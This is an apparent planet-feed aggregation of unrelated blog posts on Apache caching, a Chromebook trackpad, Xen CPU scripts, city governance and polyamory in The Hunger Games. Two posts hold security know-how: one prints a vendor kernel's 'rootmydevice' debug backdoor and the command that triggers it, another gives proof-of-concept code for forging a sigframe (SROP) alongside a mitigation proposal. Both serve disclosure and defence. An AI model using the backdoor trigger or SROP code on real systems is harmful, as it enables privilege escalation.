root@marcos:/etc/apache2# git diff
diff --git a/apache2/conf-available/expires.conf b/apache2/conf-available/expires.conf
index 214f3dd..a983738 100644
--- a/apache2/conf-available/expires.conf
+++ b/apache2/conf-available/expires.conf
@@ -3,8 +3,18 @@
   # Enable expirations.
   ExpiresActive On

-  # Cache all files for 2 weeks after access (A).
-  ExpiresDefault A1209600
+  # Cache all files 12 hours after access
+  ExpiresDefault "access plus 12 hours"
+
+  # RSS feeds should refresh more often
+  <FilesMatch \.(rss)$>
+    ExpiresDefault "modification plus 4 hours"
+  </FilesMatch> 
+
+  # images are *less* likely to change
+  <FilesMatch "\.(gif|jpg|png|js|css)$">
+    ExpiresDefault "access plus 1 month"
+  </FilesMatch>

   <FilesMatch \.(php|cgi)$>
     # Do not allow scripts to be cached unless they explicitly send cache

I also lowered the general cache expiry, except for images, Javascript and CSS.

Planet Venus maintenance

A small last word about all this: I'm surprised to see that Planet Debian is running a 6 year old software that hasn't seen a single official release yet, with local patches on top. It seems that Venus is well designed, I must give them that, but it's a little worrisome to see great software just rotting around like this.

A good "planet" site seems like a resource a lot of FLOSS communities would need: is there another "Planet-like" aggregator out there that is well maintained and more reliable? In Python, preferably.

PlanetPlanet, which Venus was forked from, is out of the question: it is even less maintained than the new fork, which itself seems to have died in 2011.

There is a discussion about the state of Venus on Github which reflects some of the concerns expressed here, as well as on the mailing list. The general consensus seems to be that everyone should switch over to Planet Pluto, which is written in Ruby.

I am not sure which planet Debian sits on - Pluto? Venus? Besides, Pluto is not even a planet anymore...

Mike check!

So this is also a test to see if my posts reach Debian Planet correctly. I suspect no one will ever see this on the top of their feeds, since the posts do get there, but with a 10 days delay and with the original date, so they are "sunk" down. The above expiration fixes won't take effect until the 10 days delay is over... But if you did see this as noise, retroactive apologies in advance for the trouble.

If you are reading this from somewhere else and wish to say hi, don't hesitate, it's always nice to hear from my readers.

Planet DebianThadeu Lima de Souza Cascardo: Chromebook Trackpad

Three years ago, I wanted to get a new laptop. I wanted something that could run free software, preferably without blobs, with some good amount of RAM, good battery and very light, something I could carry along with a work laptop. And I didn't want to spend too much. I don't want to make this too long, so in the end, I asked in the store anything that didn't come with Windows installed, and before I was dragged into the Macbook section, I shouted "and no Apple!". That's how I got into the Chromebook section with two options before me.

There was the Chromebook Pixel, too expensive for me, and the Samsung Chromebook, using ARM. Getting a laptop with an ARM processor was interesting for me, because I like playing with different stuff. I looked up if it would be possible to run something other than ChromeOS on it, got the sense that is, it would, and make a call. It does not have too much RAM, but it was cheap. I got an external HD to compensate for the lack of storage (only 16GB eMMC), and that was it.

Wifi does require non-free firmware to be loaded, but booting was a nice surprise. It is not perfect, but I will see if I can get to that another day.

I managed to get Fedora installed, downloading chunks of an image that I could write into the storage. After a while, I backed up home, and installed Debian using debootstrap.

Recently, after an upgrade from wheezy to jessie, things stopped working. systemd would not mount the most basic partitions and would simply stop very early in the boot process. That's a story on my backlog as well, that I plan to tell soon, since I believe this connects with supporting Debian on mobile devices.

After fixing some things, I decided to try libinput instead of synaptics for the Trackpad. The Chromebook uses a Cypress APA Trackpad. The driver was upstreamed in Linux 3.9. The Chrome OS ships with Linux 3.4, but had the driver in its branch.

After changing to libinput, I realized clicking did not work. Neither did tapping. I moved back to synaptics, and was reminded things didn't work too well with that either. I always had to enable tapping.

I have some experience with input devices. I wrote drivers, small applications reacting to some events, and some uinput userspace drivers as well. I like playing with that subsystem a lot. But I don't have too much experience with multitouch and libinput is kind of new for me too.

I got my hands on the code and found out there is libinput-debug-events. It will show you how libinput translates evdev events. I clicked on the Trackpad and got nothing but some pointer movements. I tried evtest and there were some multitouch events I didn't understand too well, but it looked like there were important events there that I thought libinput should have recognized.

I tried reading some of libinput code, but didn't get too far before I tried something else. But then, I had to let this exercise for another day. Today, I decided to do it again. Now, with some fresh eyes, I looked at the driver code. It showed support for left, right and middle buttons. But maybe my device doesn't support it, because I don't remember seeing it on evtest when clicking the Trackpad. I also understood better the other multitouch events, they were just saying how many fingers there were and what was the position of which one of them. In the case of a single finger, you still get an identifier. For better understanding of all this, reading Documentation/input/event-codes.txt and Documentation/input/multi-touch-protocol.txt is recommended.

So, in trying to answer if libinput needs to handle my devices events properly, or handle my device specially, or if the driver requires changes, or what else I can do to have a better experience with this Trackpad, things were tending to the driver and device. Then, after running evtest, I noticed a BTN_LEFT event. OK, so the device and driver support it, what is libinput doing with that? Running evtest and libinput-debug-events at the same time, I found out the problem. libinput was handling BTN_LEFT correctly, but the driver was not reporting it all the time.

By going through the driver, it looks like this is either a firmware or a hardware problem. When you get the click response, sound and everything, the drivers will not always report it. It could be pressure, eletrical contact, I can't tell for sure. But the driver does not check for anything but what the firmware has reported, so it's not the driver.

A very interesting I found out is that you can read and write the firmware. I dumped it to a file, but still could not analyze what it is. There are some commands to put the driver into some bootloader state, so maybe it's possible to play with the firmware without bricking the device, though I am not sure yet. Even then, the problem might not be fixable by just changing the firmware.

So, I left with the possibility of using tapping, which was not working with libinput. Grepping at the code, I found out by libinput documentation that tapping needs to be enabled. The libinput xorg driver supports that. Just set the Tapping option to true and that's it.

So, now I am a happy libinput user, with some of the same issues I had before with synaptics, but something you get used to. And I have a new firmware in front of me that maybe we could tackle by some reverse engineering.

Planet Linux AustraliaColin Charles: London roadshow wrap-up, see you in Paris next week

Just a few days ago, I presented at the MariaDB Roadshow in London, and I had a lot of fun. While I had canned slides, I did know the topic intimately well, so it was good to get further in-depth. In addition, we had these MasterMind sessions, basically the place to get one-on-one time with Anders/Luisa/or me, I noticed that pretty much everyone said they were buying services afterwards (which more or less must mean the event was rather successful from that standpoint!).

In addition to that, I was happy to see that from attendee feedback, I did have the highest averages – thank you!

So here’s to repeating this in Paris next week — Gestion des données pour les applications vitales – MariaDB Roadshow Paris. I look forward to seeing you there, and I know we are repeating the MasterMind sessions. To fine-tune it, try to bring as much information as you possibly can so our time can be extremely effective.

Planet Linux AustraliaTim Serong: The Politics of Resentment

I’ve been reading The Archdruid Report regularly for a long time now, because unlike me, John Michael Greer posts every week and always writes something interesting. Given that we’ve got a federal election coming up in Australia and that I’ve mentioned one of JMG’s notions on the current state of politics to several people over the last few months, I though I’d provide a TL;DR here:

If you want, you can split people in the US into four classes, based on how they get most of their income:

  1. The investment class (income derived from returns on investment)
  2. The salary class (who receive a monthly salary)
  3. The wage class (who receive an hourly wage)
  4. The welfare class (who receive welfare payments)

According to JMG, over the last fifty years or so, three of these classes of people have remained roughly where they are; the investment class still receives returns on investment (modulo a recession or two), the salary class still draws a reasonable salary, and life still sucks for people on welfare. But the wage class, to be blunt, has been systematically fucked over this time period. There’s a lot of people there, and it’s this disenfranchised group who sees someone outside the political establishment status quo (Trump) as someone they can get behind. Whether or not Trump is elected in the US, there’s still going to be a whole lot of people out there pissed off with the current state of things, and it’s going to be really interesting to see how this plays out.

You should probably go read the full post, because I doubt I’ve done it justice here, but I don’t think it’s unreasonable to imagine the same (or a similar) thesis might be valid for Australia, so my question is: what, if anything, does this mean for our 2016 federal election?

Planet DebianRussell Coker: Xen CPU Use per Domain again

8 years ago I wrote a script to summarise Xen CPU use per domain [1]. Since then changes to Xen required changes to the script. I have new versions for Debian/Wheezy (Xen 4.1) and Debian/Jessie (Xen 4.4).

Here’s a new script for Debian/Wheezy:

#!/usr/bin/perl
use strict;

open(LIST, "xm list --long|") or die "Can't get list";

my $name = "Dom0";
my $uptime = 0.0;
my $cpu_time = 0.0;
my $total_percent = 0.0;
my $cur_time = time();

open(UPTIME, "</proc/uptime") or die "Can't open /proc/uptime";
my @arr = split(/ /, <UPTIME>);
$uptime = $arr[0];
close(UPTIME);

my %all_cpu;

while(<LIST>)
{
  chomp;
  if($_ =~ /^\)/)
  {
    my $cpu = $cpu_time / $uptime * 100.0;
    if($name =~ /Domain-0/)
    {
      printf("%s uses %.2f%% of one CPU\n", $name, $cpu);
    }
    else
    {
      $all_cpu{$name} = $cpu;
    }
    $total_percent += $cpu;
    next;
  }
  $_ =~ s/\).*$//;
  if($_ =~ /start_time /)
  {
    $_ =~ s/^.*start_time //;
    $uptime = $cur_time – $_;
    next;
  }
  if($_ =~ /cpu_time /)
  {
    $_ =~ s/^.*cpu_time //;
    $cpu_time = $_;
    next;
  }
  if($_ =~ /\(name /)
  {
    $_ =~ s/^.*name //;
    $name = $_;
    next;
  }
}
close(LIST);

sub hashValueDescendingNum {
  $all_cpu{$b} <=> $all_cpu{$a};
}

my $key;

foreach $key (sort hashValueDescendingNum (keys(%all_cpu)))
{
  printf("%s uses %.2f%% of one CPU\n", $key, $all_cpu{$key});
}

printf("Overall CPU use approximates %.1f%% of one CPU\n", $total_percent);

Here’s the script for Debian/Jessie:

#!/usr/bin/perl

use strict;

open(UPTIME, "xl uptime|") or die "Can't get uptime";
open(LIST, "xl list|") or die "Can't get list";

my %all_uptimes;

while(<UPTIME>)
{
  chomp $_;

  next if($_ =~ /^Name/);
  $_ =~ s/ +/ /g;

  my @split1 = split(/ /, $_);
  my $dom = $split1[0];
  my $uptime = 0;
  my $time_ind = 2;
  if($split1[3] eq "days,")
  {
    $uptime = $split1[2] * 24 * 3600;
    $time_ind = 4;
  }
  my @split2 = split(/:/, $split1[$time_ind]);
  $uptime += $split2[0] * 3600 + $split2[1] * 60 + $split2[2];
  $all_uptimes{$dom} = $uptime;
}
close(UPTIME);

my $total_percent = 0;

while(<LIST>)
{
  chomp $_;

  my $dom = $_;
  $dom =~ s/ .*$//;

  if ( $_ =~ /(\d+)\.[0-9]$/ )
  {
    my $percent = $1 / $all_uptimes{$dom} * 100.0;
    $total_percent += $percent;
    printf("%s uses %.2f%% of one CPU\n", $dom, $percent);
  }
  else
  {
    next;
  }
}

printf("Overall CPU use approximates  %.1f%% of one CPU\n", $total_percent);

Planet DebianMichal Čihař: Fifteen years with phpMyAdmin and free software

Today it's fifteen years from my first contribution to free software. I've changed several jobs since that time, all of them involved quite a lot of free software and now I'm fully working on free software.

The first contribution happened to be on phpMyAdmin and did consist of Czech translation:

Subject: Updated Czech translation of phpMyAdmin
From: Michal Cihar <cihar@email.cz>
To: swix@users.sourceforge.net
Date: Mon, 14 May 2001 11:23:36 +0200
X-Mailer: KMail [version 1.2]

Hi

I've updated (translated few added messages) Czech translation of phpMyAdmin. 
I send it to you in two encodings, because I thing that in distribution 
should be included version in ISO-8859-2 which is more standard than Windows 
1250.

Regards
    Michal Cihar

Many other contributions came afterwards, several projects died on the way, but it has been a great ride so far. To see some of these you can look at my software page which contains both current and past projects and also includes later opensourced tools I've created earlier (mostly for Windows).

These days you can find me being active on phpMyAdmin, Gammu, python-gammu and Wammu, Debian and Weblate.

Filed under: Debian English phpMyAdmin SUSE | 2 comments

Planet DebianGunnar Wolf: Debugging backdoors and the usual software distribution for embedded-oriented systems

In the ARM world, to which I am still mostly a newcomer (although I've been already playing with ARM machines for over two years, I am a complete newbie compared to my Debian friends who live and breathe that architecture), the most common way to distribute operating systems is to distribute complete, already-installed images. I have ranted in the past on how those images ought to be distributed.

Some time later, I also discussed on my blog on how most of this hardware requires unauditable binary blobs and other non-upstreamed modifications to Linux.

In the meanwhile, I started teaching on the Embedded Linux diploma course in Facultad de Ingeniería, UNAM. It has been quite successful — And fun.

Anyway, one of the points we make emphasis on to our students is that the very concept of embedded makes the mere idea of downloading a pre-built, 4GB image, loaded with a (supposedly lightweight, but far fatter than my usual) desktop environment and whatnot an irony.

As part of the "Linux Userspace" and "Boot process" modules, we make a lot of emphasis on how to build a minimal image. And even leaving installed size aside, it all boils down to trust. We teach mainly four different ways of setting up a system:

  • Using our trusty Debian Installer in the (unfortunately few) devices where it is supported
  • Installing via Debootstrap, as I did in my CuBox-i tutorial (note that the tutorial is nowadays obsolete. The CuBox-i can boot with Debian Installer!) and just keeping the boot partition (both for u-boot and for the kernel) of the vendor-provided install
  • Building a barebones system using the great Buildroot set of scripts and hacks
  • Downloading a full, but minimal, installed image, such as OpenWRT (I have yet to see what's there about its fork, LEDE)

Now... In the past few days, a huge vulnerability / oversight was discovered and made public, supporting my distrust of distribution forms that do not come from, well... The people we already know and trust to do this kind of work!

Most current ARM chips cannot run with the stock, upstream Linux kernel. Then require a set of patches that different vendors pile up to support their basic hardware (remember those systems are almost always systems-on-a-chip (SoC)). Some vendors do take the hard work to try to upstream their changes — that is, push the changes they did to the kernel for inclusion in mainstream Linux. This is a very hard task, and many vendors just abandon it.

So, in many cases, we are stuck running with nonstandard kernels, full with huge modifications... And we trust them to do things right. After all, if they are knowledgeable enough to design a SoC, they should do at least decent kernel work, right?

Turns out, it's far from the case. I have a very nice and nifty Banana Pi M3, based on the Allwinner A83T SoC. 2GB RAM, 8 ARM cores... A very nice little system, almost usable as a desktop. But it only boots with their modified 3.4.x kernel.

This kernel has a very ugly flaw: A debugging mode left open, that allows any local user to become root. Even on a mostly-clean Debian system, installed by a chrooted debootstrap:

  1. Debian GNU/Linux 8 bananapi ttyS0
  2.  
  3. banana login: gwolf
  4. Password:
  5.  
  6. Last login: Thu Sep 24 14:06:19 CST 2015 on ttyS0
  7. Linux bananapi 3.4.39-BPI-M3-Kernel #9 SMP PREEMPT Wed Sep 23 15:37:29 HKT 2015 armv7l
  8.  
  9. The programs included with the Debian GNU/Linux system are free software;
  10. the exact distribution terms for each program are described in the
  11. individual files in /usr/share/doc/*/copyright.
  12.  
  13. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  14. permitted by applicable law.
  15.  
  16. gwolf@banana:~$ id
  17. uid=1001(gwolf) gid=1001(gwolf) groups=1001(gwolf),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
  18. gwolf@banana:~$ echo rootmydevice > /proc/sunxi_debug/sunxi_debug
  19. gwolf@banana:~$ id
  20. groups=0(root),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),1001(gwolf)

Why? Oh, well, in this kernel somebody forgot to comment out (or outright remove!) the sunxi-debug.c file, or at the very least, a horrid part of code therein (it's a very small, simple file):

  1. if(!strncmp("rootmydevice",(char*)buf,12)){
  2. cred = (struct cred *)__task_cred(current);
  3. cred->uid = 0;
  4. cred->gid = 0;
  5. cred->suid = 0;
  6. cred->euid = 0;
  7. cred->euid = 0;
  8. cred->egid = 0;
  9. cred->fsuid = 0;
  10. cred->fsgid = 0;
  11. printk("now you are root\n");
  12. }

Now... Just by looking at this file, many things should be obvious. For example, this is not only dangerous and lazy (it exists so developers can debug by touching a file instead of... typing a password?), but also goes against the kernel coding guidelines — the file is not documented nor commented at all. Peeking around other files in the repository, it gets obvious that many files lack from this same basic issue — and having this upstreamed will become a titanic task. If their programmers tried to adhere to the guidelines to begin with, integration would be a much easier path. Cutting the wrong corners will just increase the needed amount of work.

Anyway, enough said by me. Some other sources of information:

There are surely many other mentions of this. I just had to repeat it for my local echo chamber, and for future reference in class! ;-)

,

TEDBenjamin Barber’s idea of a Global Parliament of Mayors to become reality in September

Benjamin_Barber_CTA (1)

In the face of global crises like climate change and refugee migration, it seems sometimes that nation-states are hopelessly gridlocked and unable to act. At TEDGlobal 2013, political theorist Benjamin Barber laid out a counter-proposal: Go local. Big cities are demonstrating a remarkable capacity to govern themselves democratically and efficiently in networks, both locally and globally. They share certain unique qualities that can elude bigger entities: pragmatism, civic trust, participation, creativity and cooperation. Mayors implement practical change every day. So, Barber suggests, we should give mayors more power — including with big global issues.

In Barber’s 2014 book If Mayors Ruled the World. Dysfunctional Nations, Rising Cities he proposes the Global Parliament of Mayors, a global governance platform that brings together collective urban political power. Now, it’s become a reality. From September 10–12, some 100 mayors of major cities and representatives of urban networks will meet in The Hague.

In this Q&A, Barber shares details on the need for a Global Parliament of Mayors, the upcoming gathering, and what it took to turn this dream into a reality.

Professor Barber, give us the cheat sheet on the Global Parliament of Mayors: Why is it needed?

Traditional nation-states and international organizations have become less able to discharge their sovereign responsibility to secure the lives, liberties and property of their citizens, especially in the face of existential threats like climate change. It’s a sort of sovereign default, and it has left cities to carry the responsibility for sustainability and other global goods. For that, they need a global urban governance network that is both democratic and efficient — something that goes further than the urban networks we already have. Namely, a Global Parliament of Mayors that can offer cities a megaphone for their collective urban voice and a platform for common urban policy-making.

You are basically making a counterintuitive claim that, in a globalizing world, democracy’s best hope is not found in a global government, but locally in cities.

It is only counterintuitive if you assume local and global are antonyms. But in the new world of interdependence, local problems are global problems, and municipal goods are global goods. Think about refugees, pandemic disease, inequality, crime, markets, terrorism and of course, climate change; These are all global challenges that manifest themselves locally in cities. Problems and solutions today are “glocal”: at once both local and global. Indeed, the irony is that states tend to be bordered, insulated and parochial, while cities have become open, transactional, urbane and cosmopolitan — the carrier of universal values. That is why urban networks have been more successful in addressing global challenges than nation-states.

Who will participate in the Hague gathering?

Because it is the inaugural convening of a new democratic governance body with a global compass, we are gathering representatives of more than 100 cities from around the world, North and South, developed and developing, wealthy and poor, large and small — as few as 200,000 residents. We also seek representation by mayors, rather than their deputies, so that the crucial decisions have the full legitimacy of mayoral participation.

What was the journey from the idea of the GPM to actually convening it?

I proposed the governance body in the final chapter of my book If Mayors Ruled the World. Almost immediately following its publication and my TED Talk in 2013, I began to hear from sitting mayors, including those in Seoul, Los Angeles, London, Hamburg, Boston and elsewhere, inquiring about the idea with interest and enthusiasm. This interest resulted in planning meetings in Seoul with Mayor Park Won-soon, in New York City with the publication CityLab and in Amsterdam with several mayors in The Netherlands, including Mayor Eberhard van der Laan, Mayor Ahmed Aboutaleb and Mayor Jozias van Aartsen. In the summer of 2015, Mayor van Aartsen proposed that The Hague be the site for the inaugural convening in September 2016. The process, led by visionary mayors, was laborious but unwavering, animated by our small GPM team in New York and facilitated by our advisory committee and the City of The Hague.

How is the event structured? What kind of discussions will take place?

Over a three-day weekend, we will hold four parliamentary sessions, starting with three plenaries, on climate change (“The City and Nature”), refugees (“Arrival Cities”) and governance (“The City and Democracy”). Each plenary will aim to put a few key practical proposals for common action on the table. Proposals will call for opt-in by individual cities, rather than top-down imperatives, and will be prepared in advance by our Advisory Committee, with mayors debating and amending them with the assistance of experts from relevant urban networks, such as the C40 Climate Cities and EFUS (the European Forum for Urban Security). A final plenary session will offer the opportunity for formal ratification of agreed-upon proposals.

What do you hope happens during this inaugural gathering?

The two principal aims of the GPM are to establish the legitimacy and continuity of the new global organization of mayors as a governance body — including future meetings and a digital platform where mayors can meet online — and to demonstrate the capacity of cities to establish common policies in critical domains, such as climate change and refugees, that can serve their citizens when nation-states are gridlocked and unable to act. Cities have both a responsibility and a right to act on behalf of their citizens in critical areas of sustainability and liberty when states do not or cannot act. Some mayors are willing to act autonomously while others prefer a model of full cooperation with states. Yet in the end, citizens have a right to life and liberty and sustainability too, which means that cities have a right to govern on their behalf when that is the only road to sustainability. The argument is laid out in our document “Declaration of the Rights of Cities and Citizens.”

You have a new book coming out early next year. Can you give us a preview?

It will be titled Cool Cities: Urban Sustainability in a Warming World, from Yale Press. It is a kind of sequel to the previous book and looks at the role cities have played in combating climate change through existing urban networks like the C40 Climate and ICLEI and in the new Global Parliament of Mayors. It makes the case for mayors governing collaboratively to curb greenhouse gases and promote decarbonization. And it shows that they can go well beyond the COP21 agreement reached in Paris last December in getting real results.

Watch Benjamin Barber’s TEDGlobal talk proposing the Global Parliament of Mayors >>


Sociological ImagesCompulsory Monogamy in The Hunger Games

TSP_Assigned_pbk_978-0-393-28445-4Assigned: Life with Gender is a new anthology featuring blog posts by a wide range of sociologists writing at The Society Pages and elsewhere. To celebrate, we’re re-posting four of the essays as this month’s “flashback Fridays.” Enjoy! And to learn more about this anthology, a companion to Wade and Ferree’s Gender: Ideas, Interactions, Institutions, please click here.

.

Compulsory Monogamy in The Hunger Games, by Mimi Schippers, PhD

NPR’s Linda Holmes wrote a great article about the gender dynamics in The Hunger Games: Catching Fire and concluded, “…you could argue that Katniss’ conflict between Peeta and Gale is effectively a choice between a traditional Movie Girlfriend and a traditional Movie Boyfriend.”  I do love the way Holmes puts this.  Gender, it seems, is not what one is, but what one does.  Different characteristics we associate with masculinity and femininity are available to everyone, and when Peeta embodies some characteristics we usually see only in women’s roles, Peeta becomes the Movie Girlfriend despite being a boy.

Though I find this compelling, I want to take a moment to focus on the other part of this sentence… the part when Holmes frames Katniss’ relationship to Peeta and Gale as a “conflict between” and a “choice.”  I think that, in some ways, the requirement to choose one or the other forces Katniss’ to, not only “choose” a boyfriend, but also to choose gender—for herself.

hgcf

Depending on whether she’s relating to Peeta or Gale, she is either someone who takes charge, is competent in survival, and protects her partner (traditionally the masculine role) or someone who lets another lead and nurtures instead of protects (the feminine role).  As Candace West and Don Zimmerman suggested many years ago in their article “Doing Gender,” we do gender in relationship to other people.  It’s a conversation or volley in which we’re expected to play the part to the way others are doing gender.

When Katniss is with Peeta, she does a form of masculinity in relationship and reaction to his behavior and vice versa.  Because Peeta “calls out” protection, Katniss steps up.  When Gale calls out nurturing, she plays the part.  In other words, not only is gender a “doing” rather than a “being,” it is also an interactive process.  Because Katniss is in relationship to both Peeta and Gale, and because each embodies and calls out different ways of doing gender, Katniss oscillates between being the “movie boyfriend” sometimes and the “movie girlfriend” other times and, it seems, she’s facile and takes pleasure in doing all of it.  If Katniss has to “choose” Peeta or Gale, she will have to give up doing gender in this splendid, and, dare I say, feminist and queer way in order to “fit” into her and her “girlfriend’s” or “boyfriend’s” relationship.

Now imagine a world in which Katniss wouldn’t have to choose.

What if she could be in a relationship with Peeta and get her needs for being understood, nurtured, and protective while also getting her girl on with Gale?  In other words, imagine a world without compulsory monogamy where having two or more boyfriends or girlfriends was possible.

I’m currently working on a book on monogamy and the queer potential for open and polyamorous relationships. I’m writing about the ways in which compulsory monogamy fits nicely into and perpetuates cultural ideas about masculinity and femininity and how different forms of non-monogamy might open up alternative ways of doing, not just relationships, but also gender.

Forcing Katniss to choose is forcing Katniss into monogamy, and as I suggested above, into doing gender to complement her partner.  Victoria Robinson points out in her article, “My Baby Just Cares for Me,” that monogamy compels women to invest too much time, energy, and resources into an individual man and limits their autonomy and relationships with others.  What Robinson doesn’t talk about is how it also limits women’s range of how they might do gender in relationship to others.

It also limits men’s range of doing gender in relationships.  Wouldn’t it be nice if Peeta and Gale never felt the pressure to be something they are not?  Imagine how Peeta’s and Gale’s masculinities would have to be reconfigured to accommodate and accept each other?

Elisabeth Sheff, in her groundbreaking research on polyamorous people, found that both women and men in polyamorous relationships say that the men have to rethink their masculinities to be less possessive, women have room to be more assertive about their needs and desires, and men are more accommodating.

What this suggests is that monogamy doesn’t just limit WHO you can do; it also limits WHAT you can do in terms of gender.  Might I suggest that Katniss is such a well-rounded woman character precisely because she is polyamorous?  She’s not just the phallic girl with the gun… or bow in this case… or the damsel in distress.  She’s strong, vulnerable, capable, nurturing, and loyal, and we get to see all of it because she does gender differently with her boyfriends.  And therein, I believe, is one way that polyamory has a queer and feminist potential.  It can open up the field of doing gender within the context of relationships.

I don’t know how her story ends, but I for one, am hoping that, if there is a happily-ever-after for Katniss, it’s not because girl gets boy; its because girl gets both boys.

Mimi Schippers, PhD is an Associate Professor of Sociology at Tulane University.  Her new book on the radical potential of non-monogamy is called Beyond Monogamy: Polyamory and the Future of Polyqueer Sexualities. You can follow her at Marx in Drag.

Originally posted in 2013 at Marx in Drag. Cross-posted at Huffington Post, and Jezebel. Images from IMDB

(View original at https://thesocietypages.org/socimages)

Planet Linux AustraliaChris Smart: Signal Return Orientated Programming attacks

When a process is interrupted, the kernel suspends it and stores its state in a sigframe which is placed on the stack. The kernel then calls the appropriate signal handler code and after a sigreturn system call, reads the sigframe off the stack, restores state and resumes the process. However, by crafting a fake sigframe, we can trick the kernel into executing something else.

My friend Rashmica, an intern at OzLabs, has written an interesting blog post about this for some work she’s doing with the POWER architecture in Linux.

Worse Than FailureError'd: Sorry About the Moon

"I have no idea what that giant glowing ball in the sky is. Space aliens, I suppose?" wrote Ian S.

 

Andreas writes, "LAN (the airline) and I seem to have differing definitions of optional."

 

"Upgrade? More looks more like a mutation to me," wrote Samuel G.

 

"I received this email with my ticket for a concert in the Netherlands," Martin B. writes, "Apparently learning Dutch is going to be harder than I was anticipating."

 

Roger writes, "Um...is Pidgin trying to tell me something?"

 

"Looks like the Carbon Capture and Storage Association should really capture and store some links," wrote M. W.

 

James D. writes, "I kid you not, this is what management wants us to use instead of our own in-house bug tracker!"

 

[Advertisement] Onsite, remote, bare-metal or cloud – create, configure and orchestrate 1,000s of servers, all from the same dashboard while continually monitoring for drift and allowing for instantaneous remediation. Download Otter today!

Planet Linux Australiasthbrx - a POWER technical blog: SROP Mitigation

What is SROP?

Sigreturn Oriented Programming - a general technique that can be used as an exploit, or as a backdoor to exploit another vulnerability.

Okay, but what is it?

Yeah... Let me take you through some relevant background info, where I skimp on the details and give you the general picture.

In Linux, software interrupts are called signals. More about signals here! Generally a signal will convey some information from the kernel and so most signals will have a specific signal handler (some code that deals with the signal) setup.

Signals are asynchronous - ie they can be sent to a process/program at anytime. When a signal arrives for a process, the kernel suspends the process. The kernel then saves the 'context' of the process - all the general purpose registers (GPRs), the stack pointer, the next-instruction pointer etc - into a structure called a 'sigframe'. The sigframe is stored on the stack, and then the kernel runs the signal handler. At the very end of the signal handler, it calls a special system call called 'sigreturn' - indicating to the kernel that the signal has been dealt with. The kernel then grabs the sigframe from the stack, restores the process's context and resumes the execution of the process.

This is the rough mental picture you should have:

Double Format

Okay... but you still haven't explained what SROP is..?

Well, if you insist...

The above process was designed so that the kernel does not need to keep track of what signals it has delivered. The kernel assumes that the sigframe it takes off the stack was legitimately put there by the kernel because of a signal. This is where we can trick the kernel!

If we can construct a fake sigframe, put it on the stack, and call sigreturn, the kernel will assume that the sigframe is one it put there before and will load the contents of the fake context into the CPU's registers and 'resume' execution from where the fake sigframe tells it to. And that is what SROP is!

Well that sounds cool, show me!

Firstly we have to set up a (valid) sigframe:

By valid sigframe, I mean a sigframe that the kernel will not reject. Luckily most architectures only examine a few parts of the sigframe to determine the validity of it. Unluckily, you will have to dive into the source code to find out which parts of the sigframe you need to set up for your architecture. Have a look in the function which deals with the syscall sigreturn (probably something like sys_sigreturn() ).

For a real time signal on a little endian powerpc 64bit machine, the sigframe looks something like this:

struct rt_sigframe {
        struct ucontext uc;
        unsigned long _unused[2];
        unsigned int tramp[TRAMP_SIZE];
        struct siginfo __user *pinfo;
        void __user *puc;
        struct siginfo info;
        unsigned long user_cookie;
        /* New 64 bit little-endian ABI allows redzone of 512 bytes below sp */
        char abigap[USER_REDZONE_SIZE];
} __attribute__ ((aligned (16)));

The most important part of the sigframe is the context or ucontext as this contains all the register values that will be written into the CPU's registers when the kernel loads in the sigframe. To minimise potential issues we can copy valid values from the current GPRs into our fake ucontext:

register unsigned long r1 asm("r1");
register unsigned long r13 asm("r13");
struct ucontext ctx = { 0 };

/* We need a system thread id so copy the one from this process */
ctx.uc_mcontext.gp_regs[PT_R13] = r13;

/*  Set the context's stack pointer to where the current stack pointer is pointing */
ctx.uc_mcontext.gp_regs[PT_R1] = r1;

We also need to tell the kernel where to resume execution from. As this is just a test to see if we can successfully get the kernel to resume execution from a fake sigframe we will just point it to a function that prints out some text.

/* Set the next instruction pointer (NIP) to the code that we want executed */
ctx.uc_mcontext.gp_regs[PT_NIP] = (unsigned long) test_function;

For some reason the sys_rt_sigreturn() on little endian powerpc 64bit checks the endianess bit of the ucontext's MSR register, so we need to set that:

/* Set MSR bit if LE */
ctx.uc_mcontext.gp_regs[PT_MSR] = 0x01;

Fun fact: not doing this or setting it to 0 results in the CPU switching from little endian to big endian! For a powerpc machine sys_rt_sigreturn() only examines ucontext, so we do not need to set up a full sigframe.

Secondly we have to put it on the stack:

/* Set current stack pointer to our fake context */
r1 = (unsigned long) &ctx;

Thirdly, we call sigreturn:

/* Syscall - NR_rt_sigreturn */
asm("li 0, 172\n");
asm("sc\n");

When the kernel receives the sigreturn call, it looks at the userspace stack pointer for the ucontext and loads this in. As we have put valid values in the ucontext, the kernel assumes that this is a valid sigframe that it set up earlier and loads the contents of the ucontext in the CPU's registers "and resumes" execution of the process from the address we pointed the NIP to.

Obviously, you need something worth executing at this address, but sadly that next part is not in my job description. This is a nice gateway into the kernel though and would pair nicely with another kernel vulnerability. If you are interested in some more in depth examples, have a read of this paper.

So how can we mitigate this?

Well, I'm glad you asked. We need some way of distinguishing between sigframes that were put there legitimately by the kernel and 'fake' sigframes. The current idea that is being thrown around is cookies, and you can see the x86 discussion here.

The proposed solution is to give every sighand struct a randomly generated value. When the kernel constructs a sigframe for a process, it stores a 'cookie' with the sigframe. The cookie is a hash of the cookie's location and the random value stored in the sighand struct for the process. When the kernel receives a sigreturn, it hashes the location where the cookie should be with the randomly generated number in sighand struct - if this matches the cookie, the cookie is zeroed, the sigframe is valid and the kernel will restore this context. If the cookies do not match, the sigframe is not restored.

Potential issues:

  • Multithreading: Originally the random number was suggested to be stored in the task struct. However, this would break multi-threaded applications as every thread has its own task struct. As the sighand struct is shared by threads, this should not adversely affect multithreaded applications.
  • Cookie location: At first I put the cookie on top of the sigframe. However some code in userspace assumed that all the space between the signal handler and the sigframe was essentially up for grabs and would zero the cookie before I could read the cookie value. Putting the cookie below the sigframe was also a no-go due to the ABI-gap (a gap below the stack pointer that signal code cannot touch) being a part of the sigframe. Putting the cookie inside the sigframe, just above the ABI gap has been fine with all the tests I have run so far!
  • Movement of sigframe: If you move the sigframe on the stack, the cookie value will no longer be valid... I don't think that this is something that you should be doing, and have not yet come across a scenario that does this.

For a more in-depth explanation of SROP, click here.

Planet Linux Australiasthbrx - a POWER technical blog: Tell Me About Petitboot

